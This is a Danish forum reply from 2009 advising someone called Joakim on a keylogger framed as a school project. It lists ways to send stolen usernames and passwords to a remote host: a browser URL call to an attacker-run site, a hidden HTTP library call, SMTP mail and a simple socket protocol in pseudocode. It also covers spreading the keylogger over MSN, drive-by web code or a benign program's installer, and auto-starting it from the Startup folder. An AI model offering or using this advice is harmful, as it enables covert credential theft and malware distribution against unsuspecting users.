Hej Joakim
Umiddelbart ser jeg fire mulige løsninger, der ikke skulle være for besværlige...
1) Benytte en browser til at sende data via URL'en til en hjemmeside du har sat op på den ene comp.
Kunne f.eks. være: execute(path/to/firefox.exe "http://ip/?user=<aflæst brugernavn>&pass=<aflæst pass>"); (måske endda få IE til det - større chance for alle folk har den installeret hvis windows brugere)
Eller noget i den stil - har dog den ulempe at brugeren kan se browseren åbner op, men software/firewall vil nok næppe stoppe den i at blive eksekveret.
2) Benytte et bibliotek/library til HTTP, hvor du så via dens API kan gøre det samme som i 1, dog uden at en browser åbnes, så brugeren ikke ser at du videregiver data.
Men nye/uautoriserede programmer der evt. vil tilgå internettet kan blive stoppet af en firewall.
3) Sende oplysningerne over mail - kan også gøres ved at benytte et library til SMTP, i samme stil som 2.
4) Kode noget netværkskommunikation - er ikke så svært igen, hvis det bare er en simpel protokol der benyttes, såsom:
connect ( ip : port )
send ( user: <user> )
send ( pass: <pass> )
close_connection ( )
Hvis du benytter et nogenlunde højniveau sprog vil dette tage sig af alt benarbejdet.
Ville være rart hvis du oplyser hvilket sprog du koder i, så kan det være jeg (eller en anden) hurtigt kan finde noget simpelt netværkskode, du kan bruge.
Nu ved jeg ikke lige hvor meget information der er at finde på nettet, men jeg vil mene det er mere realistisk at sprede en keylogger over MSN, eller fra en hjemmeside der eksekverer noget kode lokalt - end i et venligsindet program's installer (men det er nok nemmere).
Hvis du spreder det via en installer og du gerne vil have programmet til at starte automatisk op, så er det nok nemmest at placere programmet i en start mappe, såsom: windows_menu->programmer->start (skulle gerne være der i XP, ved ikke lige med Vista eller Windows 7).
Dette har dog ulempen at det er nemt at se, men nu er det jo "kun" et 9. klasses projekt
Håber det her kan give dig lidt inspiration
Indlæg senest redigeret d. 30.10.2009 23:12 af Bruger #4137